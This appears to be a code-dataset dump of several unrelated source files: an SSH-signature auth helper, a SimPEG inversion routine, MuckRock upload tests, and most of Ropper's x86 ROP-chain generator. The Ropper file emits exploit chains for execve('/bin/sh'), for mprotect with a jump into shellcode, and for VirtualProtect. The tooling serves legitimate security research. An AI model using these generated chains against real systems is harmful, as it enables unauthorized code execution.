with open(message_path, "w", encoding="ASCII") as fp:
fp.write(message)
pkey_util = subprocess.run(
[
OPENSSL_BIN,
"pkeyutl",
"-sign",
"-inkey",
str(private_key_path),
"-in",
str(message_path),
"-out",
signatured_path,
]
)
if pkey_util.returncode != 0:
raise IOError("unable to sign authentication payload")
with open(signatured_path, "rb") as fp:
b64_signature = base64.b64encode(fp.read())
headers = {
"Content-type": "application/json",
"X-SSHAuth-Message": message,
"X-SSHAuth-Signature": b64_signature,
}
return client.post("/auth/ssh_authorize", headers=headers)
| gpl-3.0 | 1,822,117,277,133,348,900 | 32.431655 | 85 | 0.55283 | false |
simpeg/simpeg | SimPEG/EM/Static/IP/Run.py | 1 | 2114 | import numpy as np
from SimPEG import (Maps, DataMisfit, Regularization,
Optimization, Inversion, InvProblem, Directives)
def run_inversion(
m0, survey, actind, mesh,
std, eps,
maxIter=15, beta0_ratio=1e0,
coolingFactor=5, coolingRate=2,
upper=np.inf, lower=-np.inf,
use_sensitivity_weight=False,
alpha_s=1e-4,
alpha_x=1.,
alpha_y=1.,
alpha_z=1.,
):
"""
Run IP inversion
"""
dmisfit = DataMisfit.l2_DataMisfit(survey)
uncert = abs(survey.dobs) * std + eps
dmisfit.W = 1./uncert
# Map for a regularization
regmap = Maps.IdentityMap(nP=int(actind.sum()))
    # Related to inversion
    if use_sensitivity_weight:
        reg = Regularization.Sparse(
            mesh, indActive=actind, mapping=regmap
        )
    else:
        reg = Regularization.Sparse(
            mesh, indActive=actind, mapping=regmap,
            cell_weights=mesh.vol[actind]
        )
    reg.alpha_s = alpha_s
    reg.alpha_x = alpha_x
    reg.alpha_y = alpha_y
    reg.alpha_z = alpha_z
opt = Optimization.ProjectedGNCG(maxIter=maxIter, upper=upper, lower=lower)
invProb = InvProblem.BaseInvProblem(dmisfit, reg, opt)
beta = Directives.BetaSchedule(
coolingFactor=coolingFactor, coolingRate=coolingRate
)
betaest = Directives.BetaEstimate_ByEig(beta0_ratio=beta0_ratio)
target = Directives.TargetMisfit()
    # Need to have a basic saving function
if use_sensitivity_weight:
updateSensW = Directives.UpdateSensitivityWeights()
update_Jacobi = Directives.UpdatePreconditioner()
directiveList = [
beta, betaest, target, update_Jacobi
]
else:
directiveList = [
beta, betaest, target
]
inv = Inversion.BaseInversion(
invProb, directiveList=directiveList
)
opt.LSshorten = 0.5
opt.remember('xc')
# Run inversion
mopt = inv.run(m0)
return mopt, invProb.dpred
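# Usage sketch (assumes m0, survey, actind and mesh come from the usual
# SimPEG DC/IP setup; std/eps values are illustrative):
#
#   mopt, dpred = run_inversion(m0, survey, actind, mesh,
#                               std=0.05, eps=1e-3, maxIter=20,
#                               use_sensitivity_weight=True)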
| mit | 3,890,722,355,732,215,300 | 28.361111 | 79 | 0.621097 | false |
MuckRock/muckrock | muckrock/fine_uploader/tests.py | 1 | 6657 | """
Tests for fine uploader integration
"""
# Django
from django.test import RequestFactory, TestCase
from django.urls import reverse
# Standard Library
import json
# Third Party
from nose.tools import assert_false, eq_
# MuckRock
from muckrock.core.factories import UserFactory
from muckrock.fine_uploader import views
from muckrock.foia.factories import FOIARequestFactory, OutboundRequestAttachmentFactory
from muckrock.foia.models import OutboundRequestAttachment
class TestFineUploaderSuccessView(TestCase):
"""Tests for fine uploader success view"""
def test_success_success(self):
"""Test a successful post to the success view"""
foia = FOIARequestFactory()
request_factory = RequestFactory()
request = request_factory.post(
reverse("fine-uploader-success-request"), {"id": foia.pk, "key": "file_key"}
)
request.user = foia.user
response = views.success_request(request)
eq_(response.status_code, 200)
attachment = OutboundRequestAttachment.objects.get(foia=foia)
eq_(attachment.ffile.name, "file_key")
eq_(attachment.user, foia.user)
assert_false(attachment.sent)
def test_success_bad_comm(self):
"""Test a post to the success view with a non-existent foia"""
request_factory = RequestFactory()
request = request_factory.post(
reverse("fine-uploader-success-request"), {"id": 1234, "key": "file_key"}
)
request.user = UserFactory()
response = views.success_request(request)
eq_(response.status_code, 400)
def test_success_bad_user(self):
"""Test a post to the success view with a bad user"""
foia = FOIARequestFactory()
request_factory = RequestFactory()
request = request_factory.post(
reverse("fine-uploader-success-request"), {"id": foia.pk, "key": "file_key"}
)
request.user = UserFactory()
response = views.success_request(request)
eq_(response.status_code, 403)
def test_success_bad_data(self):
"""Test a post to the success view with missing data"""
foia = FOIARequestFactory()
request_factory = RequestFactory()
request = request_factory.post(
reverse("fine-uploader-success-request"), {"id": foia.pk}
)
request.user = foia.user
response = views.success_request(request)
eq_(response.status_code, 400)
class TestFineUploaderSessionView(TestCase):
"""Tests for fine uploader session view"""
def test_session_success(self):
"""Test a successful post to the session view"""
foia = FOIARequestFactory()
attachments = OutboundRequestAttachmentFactory.create_batch(
3, foia=foia, user=foia.user, sent=False
)
OutboundRequestAttachmentFactory.create_batch(
3, foia=foia, user=foia.user, sent=True
)
OutboundRequestAttachmentFactory.create_batch(3)
request_factory = RequestFactory()
request = request_factory.get(
reverse("fine-uploader-session-request"), {"id": foia.pk}
)
request.user = foia.user
response = views.session_request(request)
eq_(response.status_code, 200)
attm_data = json.loads(response.content)
attm_data.sort(key=lambda f: f["uuid"])
attachments.sort(key=lambda f: f.pk)
for attm_datum, attm in zip(attm_data, attachments):
eq_(attm_datum["name"], attm.name())
eq_(attm_datum["uuid"], attm.pk)
eq_(attm_datum["size"], attm.ffile.size)
eq_(attm_datum["s3Key"], attm.ffile.name)
def test_session_bad_comm(self):
"""Test a post to the session view with a non-existent foia"""
request_factory = RequestFactory()
request = request_factory.get(
reverse("fine-uploader-session-request"), {"id": 1234}
)
request.user = UserFactory()
response = views.session_request(request)
eq_(response.status_code, 400)
def test_session_bad_user(self):
"""Test a post to the session view with a bad user"""
foia = FOIARequestFactory()
request_factory = RequestFactory()
request = request_factory.get(
reverse("fine-uploader-session-request"),
{"id": foia.pk, "name": "file_name", "key": "file_key"},
)
request.user = UserFactory()
response = views.session_request(request)
eq_(response.status_code, 403)
class TestFineUploaderDeleteView(TestCase):
"""Tests for fine uploader delete view"""
def test_delete_success(self):
"""Test a successful post to the delete view"""
attm = OutboundRequestAttachmentFactory()
request_factory = RequestFactory()
request = request_factory.post(
reverse("fine-uploader-delete-request", kwargs={"idx": attm.pk})
)
request.user = attm.user
response = views.delete_request(request, attm.pk)
eq_(response.status_code, 200)
assert_false(OutboundRequestAttachment.objects.filter(pk=attm.pk).exists())
def test_delete_bad_file(self):
"""Test a post to the delete view with a non-existent file"""
request_factory = RequestFactory()
request = request_factory.post(
reverse("fine-uploader-delete-request", kwargs={"idx": 123456})
)
request.user = UserFactory()
response = views.delete_request(request, 123456)
eq_(response.status_code, 400)
def test_delete_bad_user(self):
"""Test a post to the delete view with a bad user"""
attm = OutboundRequestAttachmentFactory()
request_factory = RequestFactory()
request = request_factory.post(
reverse("fine-uploader-delete-request", kwargs={"idx": attm.pk})
)
request.user = UserFactory()
attm.user = request.user
attm.save()
response = views.delete_request(request, attm.pk)
eq_(response.status_code, 403)
class TestFineUploaderSignView(TestCase):
"""Tests for fine uploader delete view"""
class TestFineUploaderKeyView(TestCase):
"""Tests for fine uploader delete view"""
class TestFineUploaderBlankView(TestCase):
"""Tests for fine uploader blank view"""
def test_blank(self):
"""Test the blank view"""
request_factory = RequestFactory()
request = request_factory.get(reverse("fine-uploader-blank"))
request.user = UserFactory()
response = views.blank(request)
eq_(response.status_code, 200)
| agpl-3.0 | -1,638,733,558,375,629,300 | 35.576923 | 88 | 0.637224 | false |
howknows/Ropper | ropperapp/disasm/chain/arch/ropchainx86.py | 1 | 36189 | # coding=utf-8
#
# Copyright 2014 Sascha Schirra
#
# This file is part of Ropper.
#
# Ropper is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ropper is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from ropperapp.disasm.gadget import Category
from ropperapp.common.error import *
from ropperapp.common.utils import *
from ropperapp.disasm.rop import Ropper
from ropperapp.disasm.arch import x86
from ropperapp.disasm.chain.ropchain import *
from ropperapp.loaders.loader import Type
from re import match
import itertools
import math
class RopChainX86(RopChain):
MAX_QUALI = 7
def _printHeader(self):
toReturn = ''
toReturn += ('#!/usr/bin/env python\n')
toReturn += ('# Generated by ropper ropchain generator #\n')
toReturn += ('from struct import pack\n')
toReturn += ('\n')
toReturn += ('p = lambda x : pack(\'I\', x)\n')
toReturn += ('\n')
return toReturn
def _printRebase(self):
toReturn = ''
for binary,section in self._usedBinaries:
imageBase = binary.manualImagebase + section.offset if binary.manualImagebase != None else section.virtualAddress
toReturn += ('IMAGE_BASE_%d = %s # %s\n' % (self._usedBinaries.index((binary, section)),toHex(imageBase , 4), binary.fileName))
toReturn += ('rebase_%d = lambda x : p(x + IMAGE_BASE_%d)\n\n'% (self._usedBinaries.index((binary, section)),self._usedBinaries.index((binary, section))))
return toReturn
@classmethod
def name(cls):
return ''
@classmethod
def availableGenerators(cls):
return [RopChainX86System, RopChainX86Mprotect, RopChainX86VirtualProtect]
@classmethod
def archs(self):
return [x86]
def _createDependenceChain(self, gadgets):
"""
        gadgets - list of tuples
        each tuple contains:
        - method to create the chain gadget
        - list with arguments
        - dict with named arguments
        - list of registers which the gadget must not overwrite
"""
failed = []
cur_len = 0
cur_chain = ''
counter = 0
max_perm = math.factorial(len(gadgets))
for x in itertools.permutations(gadgets):
counter += 1
            self._printer.puts('\r[*] Try permutation %d / %d' % (counter, max_perm))
found = False
for y in failed:
if x[:len(y)] == y:
found = True
break
if found:
continue
try:
fail = []
chain2 = ''
dontModify = []
badRegs = []
c = 0
for idx in range(len(x)):
g = x[idx]
if idx != 0:
badRegs.extend(x[idx-1][3])
dontModify.extend(g[3])
fail.append(g)
chain2 += g[0](*g[1], badRegs=badRegs, dontModify=dontModify,**g[2])[0]
cur_chain += chain2
break
except RopChainError as e:
pass
if len(fail) > cur_len:
cur_len = len(fail)
cur_chain = '# Filled registers: '
for fa in fail[:-1]:
cur_chain += (fa[2]['reg']) + ', '
cur_chain += '\n'
cur_chain += chain2
failed.append(tuple(fail))
else:
self._printer.println('')
self._printer.printInfo('Cannot create chain which fills all registers')
# print('Impossible to create complete chain')
self._printer.println('')
return cur_chain
def _isModifiedOrDereferencedAccess(self, gadget, dontModify):
        for line in gadget.lines[1:]:
line = line[1]
if '[' in line:
return True
if dontModify:
m = match('[a-z]+ (e?[abcds][ixlh]),?.*', line)
if m and m.group(1) in dontModify:
return True
return False
def _paddingNeededFor(self, gadget):
regs = []
for idx in range(1,len(gadget.lines)):
line = gadget.lines[idx][1]
matched = match('^pop (...)$', line)
if matched:
regs.append(matched.group(1))
return regs
def _printRopInstruction(self, gadget, padding=True):
toReturn = ('rop += rebase_%d(%s) # %s\n' % (self._usedBinaries.index((gadget._binary, gadget._section)),toHex(gadget.lines[0][0],4), gadget.simpleInstructionString()))
if padding:
regs = self._paddingNeededFor(gadget)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
return toReturn
def _printAddString(self, string):
return ('rop += \'%s\'\n' % string)
def _printRebasedAddress(self, addr, comment='', idx=0):
return ('rop += rebase_%d(%s)\n' % (idx,addr))
def _printPaddingInstruction(self, addr='0xdeadbeef'):
return ('rop += p(%s)\n' % addr)
def _containsZeroByte(self, addr):
return addr & 0xff == 0 or addr & 0xff00 == 0 or addr & 0xff0000 == 0 or addr & 0xff000000 == 0
def _createZeroByteFillerForSub(self, number):
start = 0x01010101
for i in xrange(start, 0x02020202):
if not self._containsZeroByte(i) and not self._containsZeroByte(i+number):
return i
def _createZeroByteFillerForAdd(self, number):
start = 0x01010101
for i in xrange(start, 0x02020202):
if not self._containsZeroByte(i) and not self._containsZeroByte(number-i):
return i
def _find(self, category, reg=None, srcdst='dst', badDst=[], badSrc=None, dontModify=None, srcEqDst=False, switchRegs=False ):
quali = 1
while quali < RopChainX86System.MAX_QUALI:
for binary in self._binaries:
for section, gadgets in binary.gadgets.items():
for gadget in gadgets:
if gadget.category[0] == category and gadget.category[1] == quali:
if badSrc and gadget.category[2]['src'] in badSrc:
continue
if badDst and gadget.category[2]['dst'] in badDst:
continue
if not gadget.lines[len(gadget.lines)-1][1].strip().endswith('ret') or 'esp' in gadget.simpleString():
continue
if srcEqDst and (not (gadget.category[2]['dst'] == gadget.category[2]['src'])):
continue
elif not srcEqDst and 'src' in gadget.category[2] and (gadget.category[2]['dst'] == gadget.category[2]['src']):
continue
if self._isModifiedOrDereferencedAccess(gadget, dontModify):
continue
if reg:
if gadget.category[2][srcdst] == reg:
if (gadget._binary, gadget._section) not in self._usedBinaries:
self._usedBinaries.append((gadget._binary, gadget._section))
return gadget
elif switchRegs:
other = 'src' if srcdst == 'dst' else 'dst'
if gadget.category[2][other] == reg:
if (gadget._binary, gadget._section) not in self._usedBinaries:
self._usedBinaries.append((gadget._binary, gadget._section))
return gadget
else:
if (gadget._binary, gadget._section) not in self._usedBinaries:
self._usedBinaries.append((gadget._binary, gadget._section))
return gadget
quali += 1
def _createWriteStringWhere(self, what, where, reg=None, dontModify=[], idx=0):
badRegs = []
badDst = []
while True:
popReg = self._find(Category.LOAD_REG, reg=reg, badDst=badRegs, dontModify=dontModify)
if not popReg:
raise RopChainError('Cannot build writewhatwhere gadget!')
            write4 = self._find(Category.WRITE_MEM, reg=popReg.category[2]['dst'],
                                badDst=badDst, srcdst='src')
if not write4:
badRegs.append(popReg.category[2]['dst'])
continue
else:
popReg2 = self._find(Category.LOAD_REG, reg=write4.category[2]['dst'], dontModify=[popReg.category[2]['dst']]+dontModify)
if not popReg2:
badDst.append(write4.category[2]['dst'])
continue
else:
break;
if len(what) % 4 > 0:
what += ' ' * (4 - len(what) % 4)
toReturn = ''
for index in range(0,len(what),4):
part = what[index:index+4]
toReturn += self._printRopInstruction(popReg,False)
toReturn += self._printAddString(part)
regs = self._paddingNeededFor(popReg)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
toReturn += self._printRopInstruction(popReg2, False)
toReturn += self._printRebasedAddress(toHex(where+index,4), idx=idx)
regs = self._paddingNeededFor(popReg2)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
toReturn += self._printRopInstruction(write4)
return (toReturn,popReg.category[2]['dst'], popReg2.category[2]['dst'])
def _createWriteRegValueWhere(self, what, where, dontModify=[], idx=0):
badRegs = []
badDst = []
while True:
write4 = self._find(Category.WRITE_MEM, reg=what, badDst=badDst, dontModify=dontModify, srcdst='src')
if not write4:
raise RopChainError('Cannot build writewhatwhere gadget!')
else:
popReg2 = self._find(Category.LOAD_REG, reg=write4.category[2]['dst'], dontModify=[what]+dontModify)
if not popReg2:
badDst.append(write4.category[2]['dst'])
continue
else:
break;
toReturn = self._printRopInstruction(popReg2, False)
toReturn += self._printRebasedAddress(toHex(where,4), idx=idx)
regs = self._paddingNeededFor(popReg2)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
toReturn += self._printRopInstruction(write4)
return (toReturn,what, popReg2.category[2]['dst'])
def _createLoadRegValueFrom(self, what, from_reg, dontModify=[], idx=0):
try:
return self._createLoadRegValueFromMov(what, from_reg, dontModify, idx)
except:
return self._createLoadRegValueFromXchg(what, from_reg, dontModify, idx)
def _createLoadRegValueFromMov(self, what, from_reg, dontModify=[], idx=0):
badRegs = []
badDst = []
while True:
load4 = self._find(Category.LOAD_MEM, reg=what, badDst=badDst, dontModify=dontModify, srcdst='dst')
if not load4:
raise RopChainError('Cannot build loadwhere gadget!')
else:
popReg2 = self._find(Category.LOAD_REG, reg=load4.category[2]['src'], dontModify=[what,load4.category[2]['src']]+dontModify)
if not popReg2:
badDst.append(load4.category[2]['src'])
continue
else:
break;
toReturn = self._printRopInstruction(popReg2, False)
        toReturn += self._printRebasedAddress(toHex(from_reg,4), idx=idx)
regs = self._paddingNeededFor(popReg2)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
toReturn += self._printRopInstruction(load4)
return (toReturn,what, popReg2.category[2]['dst'])
def _createLoadRegValueFromXchg(self, what, from_reg, dontModify=[], idx=0):
badRegs = []
badDst = []
while True:
load4 = self._find(Category.XCHG_REG, reg=what, badDst=badDst, dontModify=dontModify, srcdst='src')
if not load4:
raise RopChainError('Cannot build loadwhere gadget!')
else:
mov = self._find(Category.LOAD_MEM, reg=load4.category[2]['dst'], badDst=badDst, dontModify=[load4.category[2]['dst']]+dontModify, srcdst='dst')
if not mov:
badDst.append(load4.category[2]['dst'])
continue
popReg2 = self._find(Category.LOAD_REG, reg=mov.category[2]['src'], dontModify=[what,load4.category[2]['src']]+dontModify)
if not popReg2:
badDst.append(load4.category[2]['src'])
continue
else:
break;
toReturn = self._printRopInstruction(popReg2, False)
toReturn += self._printRebasedAddress(toHex(from_reg,4), idx=idx)
regs = self._paddingNeededFor(popReg2)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
toReturn += self._printRopInstruction(mov)
toReturn += self._printRopInstruction(load4)
return (toReturn,what, popReg2.category[2]['dst'])
def _createNumberSubtract(self, number, reg=None, badRegs=None, dontModify=None):
if not badRegs:
badRegs=[]
while True:
sub = self._find(Category.SUB_REG, reg=reg, badDst=badRegs, badSrc=badRegs, dontModify=dontModify)
if not sub:
raise RopChainError('Cannot build number with subtract gadget for reg %s!' % reg)
popSrc = self._find(Category.LOAD_REG, reg=sub.category[2]['src'], dontModify=dontModify)
if not popSrc:
                badRegs.append(sub.category[2]['src'])
continue
popDst = self._find(Category.LOAD_REG, reg=sub.category[2]['dst'], dontModify=[sub.category[2]['src']]+dontModify)
if not popDst:
                badRegs.append(sub.category[2]['dst'])
continue
else:
break;
filler = self._createZeroByteFillerForSub(number)
toReturn = self._printRopInstruction(popSrc, False)
toReturn += self._printPaddingInstruction(toHex(filler,4))
regs = self._paddingNeededFor(popSrc)
for i in range(len(regs)):
toReturn += self._printPaddingInstruction()
toReturn += self._printRopInstruction(popDst, False)
toReturn += self._printPaddingInstruction(toHex(filler+number,4))
regs = self._paddingNeededFor(popDst)
for i in range(len(regs)):
toReturn += self._printPaddingInstruction()
toReturn += self._printRopInstruction(sub)
return (toReturn, popDst.category[2]['dst'],popSrc.category[2]['dst'])
def _createNumberAddition(self, number, reg=None, badRegs=None, dontModify=None):
if not badRegs:
badRegs=[]
while True:
sub = self._find(Category.ADD_REG, reg=reg, badDst=badRegs, badSrc=badRegs, dontModify=dontModify)
if not sub:
raise RopChainError('Cannot build number with addition gadget for reg %s!' % reg)
popSrc = self._find(Category.LOAD_REG, reg=sub.category[2]['src'], dontModify=dontModify)
if not popSrc:
                badRegs.append(sub.category[2]['src'])
continue
popDst = self._find(Category.LOAD_REG, reg=sub.category[2]['dst'], dontModify=[sub.category[2]['src']]+dontModify)
if not popDst:
badRegs.append(sub.category[2]['dst'])
continue
else:
break;
filler = self._createZeroByteFillerForAdd(number)
toReturn = self._printRopInstruction(popSrc, False)
toReturn += self._printPaddingInstruction(toHex(filler,4))
regs = self._paddingNeededFor(popSrc)
for i in range(len(regs)):
toReturn += self._printPaddingInstruction()
toReturn += self._printRopInstruction(popDst, False)
toReturn += self._printPaddingInstruction(toHex(number - filler,4))
regs = self._paddingNeededFor(popDst)
for i in range(len(regs)):
toReturn += self._printPaddingInstruction()
toReturn += self._printRopInstruction(sub)
return (toReturn, popDst.category[2]['dst'],popSrc.category[2]['dst'])
def _createNumberPop(self, number, reg=None, badRegs=None, dontModify=None):
while True:
popReg = self._find(Category.LOAD_REG, reg=reg, badDst=badRegs,dontModify=dontModify)
if not popReg:
raise RopChainError('Cannot build number with xor gadget!')
incReg = self._find(Category.INC_REG, reg=popReg.category[2]['dst'], dontModify=dontModify)
if not incReg:
if not badRegs:
badRegs = []
badRegs.append(popReg.category[2]['dst'])
else:
break
toReturn = self._printRopInstruction(popReg)
toReturn += self._printPaddingInstruction(toHex(0xffffffff,4))
for i in range(number+1):
toReturn += self._printRopInstruction(incReg)
return (toReturn ,popReg.category[2]['dst'],)
def _createNumberXOR(self, number, reg=None, badRegs=None, dontModify=None):
while True:
clearReg = self._find(Category.CLEAR_REG, reg=reg, badDst=badRegs, badSrc=badRegs,dontModify=dontModify, srcEqDst=True)
if not clearReg:
raise RopChainError('Cannot build number with xor gadget!')
if number > 0:
incReg = self._find(Category.INC_REG, reg=clearReg.category[2]['src'], dontModify=dontModify)
if not incReg:
if not badRegs:
badRegs = []
badRegs.append(clearReg.category[2]['src'])
else:
break
else:
break
toReturn = self._printRopInstruction(clearReg)
for i in range(number):
toReturn += self._printRopInstruction(incReg)
return (toReturn, clearReg.category[2]['dst'],)
def _createNumberXchg(self, number, reg=None, badRegs=None, dontModify=None):
xchg = self._find(Category.XCHG_REG, reg=reg, badDst=badRegs, dontModify=dontModify)
if not xchg:
raise RopChainError('Cannot build number gadget with xchg!')
        # behavior-preserving simplification: the original conditional always
        # picked 'src' (the 'dst' name is a non-empty string), so the number is
        # built in src and the xchg moves it into the requested register
        other = xchg.category[2]['src']
toReturn = self._createNumber(number, other, badRegs, dontModify)[0]
toReturn += self._printRopInstruction(xchg)
return (toReturn, reg, other)
def _createNumberNeg(self, number, reg=None, badRegs=None, dontModify=None):
if number == 0:
raise RopChainError('Cannot build number gadget with neg if number is 0!')
neg = self._find(Category.NEG_REG, reg=reg, badDst=badRegs, dontModify=dontModify)
if not neg:
raise RopChainError('Cannot build number gadget with neg!')
pop = self._find(Category.LOAD_REG, reg=reg, badDst=badRegs, dontModify=dontModify)
if not pop:
raise RopChainError('Cannot build number gadget with neg!')
toReturn = self._printRopInstruction(pop)
toReturn += self._printPaddingInstruction(toHex((~number)+1)) # two's complement
toReturn += self._printRopInstruction(neg)
return (toReturn, reg,)
def _createNumber(self, number, reg=None, badRegs=None, dontModify=None, xchg=True):
try:
if self._containsZeroByte(number):
try:
return self._createNumberNeg(number, reg, badRegs,dontModify)
except RopChainError as e:
if number < 50:
try:
return self._createNumberXOR(number, reg, badRegs,dontModify)
except RopChainError:
try:
return self._createNumberPop(number, reg, badRegs,dontModify)
except RopChainError:
try:
return self._createNumberSubtract(number, reg, badRegs,dontModify)
except RopChainError:
return self._createNumberAddition(number, reg, badRegs,dontModify)
else :
try:
return self._createNumberSubtract(number, reg, badRegs,dontModify)
except RopChainError:
return self._createNumberAddition(number, reg, badRegs,dontModify)
else:
popReg =self._find(Category.LOAD_REG, reg=reg, badDst=badRegs,dontModify=dontModify)
if not popReg:
raise RopChainError('Cannot build number gadget!')
toReturn = self._printRopInstruction(popReg)
toReturn += self._printPaddingInstruction(toHex(number,4))
return (toReturn , popReg.category[2]['dst'])
except:
return self._createNumberXchg(number, reg, badRegs, dontModify)
def _createAddress(self, address, reg=None, badRegs=None, dontModify=None):
popReg = self._find(Category.LOAD_REG, reg=reg, badDst=badRegs,dontModify=dontModify)
if not popReg:
raise RopChainError('Cannot build address gadget!')
toReturn = ''
toReturn += self._printRopInstruction(popReg,False)
toReturn += self._printRebasedAddress(toHex(address, 4), idx=self._usedBinaries.index((popReg._binary, popReg._section)))
regs = self._paddingNeededFor(popReg)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
return (toReturn,popReg.category[2]['dst'])
def _createSyscall(self, reg=None, badRegs=None, dontModify=None):
syscall = self._find(Category.SYSCALL, reg=None, badDst=None, dontModify=dontModify)
if not syscall:
raise RopChainError('Cannot build syscall gadget!')
toReturn = ''
toReturn += self._printRopInstruction(syscall)
return (toReturn,)
def _createOpcode(self, opcode):
return self._printRopInstruction(self._searchOpcode(opcode))
def _searchOpcode(self, opcode):
r = Ropper(self._binaries[0])
gadgets = []
for section in self._binaries[0].executableSections:
vaddr = section.virtualAddress
gadgets.extend(
r.searchOpcode(section.bytes, opcode.decode('hex'), section.offset, True, section=section))
if len(gadgets) > 0:
return gadgets[0]
else:
raise RopChainError('Cannot create gadget for opcode: %x' % opcode)
def create(self):
pass
class RopChainX86System(RopChainX86):
@classmethod
def name(cls):
return 'execve'
def _createCommand(self, what, where, reg=None, dontModify=[], idx=0):
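        # Pad the command to a multiple of 4 bytes with leading '/'
        # characters: on Linux, repeated leading slashes do not change path
        # resolution, so e.g. '///bin/sh' still names /bin/sh.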
if len(what) % 4 > 0:
what = '/' * (4 - len(what) % 4) + what
return self._createWriteStringWhere(what,where, idx=idx)
def create(self, cmd='/bin/sh'):
if len(cmd.split(' ')) > 1:
raise RopChainError('No argument support for execve commands')
self._printer.printInfo('ROPchain Generator for syscall execve:\n')
self._printer.println('\nwrite command into data section\neax 0xb\nebx address to cmd\necx address to null\nedx address to null\n')
section = self._binaries[0].getSection(b'.data')
length = math.ceil(float(len(cmd))/4) * 4
chain = self._printHeader()
chain_tmp = '\n'
chain_tmp += self._createCommand(cmd,section.struct.sh_offset+0x1000)[0]
badregs = []
while True:
ret = self._createNumber(0x0, badRegs=badregs)
chain_tmp += ret[0]
try:
chain_tmp += self._createWriteRegValueWhere(ret[1], section.struct.sh_offset+0x1000+length)[0]
break
            except RopChainError:
                badregs.append(ret[1])
gadgets = []
gadgets.append((self._createAddress, [section.struct.sh_offset+0x1000],{'reg':'ebx'},['ebx', 'bx', 'bl', 'bh']))
gadgets.append((self._createAddress, [section.struct.sh_offset+0x1000+length],{'reg':'ecx'},['ecx', 'cx', 'cl', 'ch']))
gadgets.append((self._createAddress, [section.struct.sh_offset+0x1000+length],{'reg':'edx'},['edx', 'dx', 'dl', 'dh']))
gadgets.append((self._createNumber, [0xb],{'reg':'eax'},['eax', 'ax', 'al', 'ah']))
self._printer.printInfo('Try to create chain which fills registers without delete content of previous filled registers')
chain_tmp += self._createDependenceChain(gadgets)
try:
self._printer.printInfo('Look for syscall gadget')
chain_tmp += self._createSyscall()[0]
self._printer.printInfo('syscall gadget found')
except RopChainError:
try:
self._printer.printInfo('No syscall gadget found!')
self._printer.printInfo('Look for int 0x80 opcode')
chain_tmp += self._createOpcode('cd80')
self._printer.printInfo('int 0x80 opcode found')
except:
try:
self._printer.printInfo('No int 0x80 opcode found')
self._printer.printInfo('Look for call gs:[0x10] opcode')
chain_tmp += self._createOpcode('65ff1510000000')
self._printer.printInfo('call gs:[0x10] found')
except RopChainError:
self._printer.printInfo('No call gs:[0x10] opcode found')
chain += self._printRebase()
chain += 'rop = \'\'\n'
chain += chain_tmp
chain += 'print rop'
print(chain)
class RopChainX86Mprotect(RopChainX86):
"""
Builds a ropchain for mprotect syscall
    eax 0x7d
ebx address
ecx size
edx 0x7 -> RWE
"""
@classmethod
def name(cls):
return 'mprotect'
def _createJmp(self, reg='esp'):
r = Ropper(self._binaries[0])
gadgets = []
for section in self._binaries[0].executableSections:
vaddr = section.virtualAddress
gadgets.extend(
r.searchJmpReg(section.bytes, reg, vaddr, section=section))
if len(gadgets) > 0:
if (gadgets[0]._binary, gadgets[0]._section) not in self._usedBinaries:
self._usedBinaries.append((gadgets[0]._binary, gadgets[0]._section))
return self._printRopInstruction(gadgets[0])
else:
return None
def __extract(self, param):
        if not match('0x[0-9a-fA-F]{1,8},0x[0-9a-fA-F]+', param) and not match('0x[0-9a-fA-F]{1,8},[0-9]+', param):
            raise RopChainError('Parameter has to have the following format: <hexnumber>,<hexnumber> or <hexnumber>,<number>')
split = param.split(',')
if isHex(split[1]):
return (int(split[0], 16), int(split[1], 16))
else:
return (int(split[0], 16), int(split[1], 10))
def create(self, param=None):
if not param:
raise RopChainError('Missing parameter: address:size')
address, size = self.__extract(param)
self._printer.printInfo('ROPchain Generator for syscall mprotect:\n')
        self._printer.println('eax 0x7d\nebx address\necx size\nedx 0x7 -> RWE\n')
chain = self._printHeader()
chain += 'shellcode = \'\\xcc\'*100\n\n'
gadgets = []
gadgets.append((self._createNumber, [address],{'reg':'ebx'},['ebx', 'bx', 'bl', 'bh']))
gadgets.append((self._createNumber, [size],{'reg':'ecx'},['ecx', 'cx', 'cl', 'ch']))
gadgets.append((self._createNumber, [0x7],{'reg':'edx'},['edx', 'dx', 'dl', 'dh']))
gadgets.append((self._createNumber, [0x7d],{'reg':'eax'},['eax', 'ax', 'al', 'ah']))
self._printer.printInfo('Try to create chain which fills registers without delete content of previous filled registers')
chain_tmp = ''
chain_tmp += self._createDependenceChain(gadgets)
try:
self._printer.printInfo('Look for syscall gadget')
chain_tmp += self._createSyscall()[0]
self._printer.printInfo('syscall gadget found')
except RopChainError:
chain_tmp += '\n# ADD HERE SYSCALL GADGET\n\n'
self._printer.printInfo('No syscall gadget found!')
self._printer.printInfo('Look for jmp esp')
jmp_esp = self._createJmp()
if jmp_esp:
self._printer.printInfo('jmp esp found')
chain_tmp += jmp_esp
else:
            self._printer.printInfo('no jmp esp found')
chain_tmp += '\n# ADD HERE JMP ESP\n\n'
chain += self._printRebase()
chain += '\nrop = \'\'\n'
chain += chain_tmp
chain += 'rop += shellcode\n\n'
chain += 'print(rop)\n'
print(chain)
class RopChainX86VirtualProtect(RopChainX86):
"""
Builds a ropchain for a VirtualProtect call using pushad
eax 0x90909090
ecx old protection (writable addr)
edx 0x40 (RWE)
ebx size
esp address
ebp return address (jmp esp)
esi pointer to VirtualProtect
edi ret (rop nop)
"""
@classmethod
def name(cls):
return 'virtualprotect'
def _createPushad(self):
pushad = self._find(Category.PUSHAD)
if pushad:
return self._printRopInstruction(pushad)
else:
self._printer.printInfo('No pushad found!')
return '# Add here PUSHAD gadget!'
def _createJmp(self, reg='esp'):
r = Ropper(self._binaries[0])
gadgets = []
for section in self._binaries[0].executableSections:
vaddr = section.offset
gadgets.extend(
r.searchJmpReg(section.bytes, reg, vaddr, section=section))
if len(gadgets) > 0:
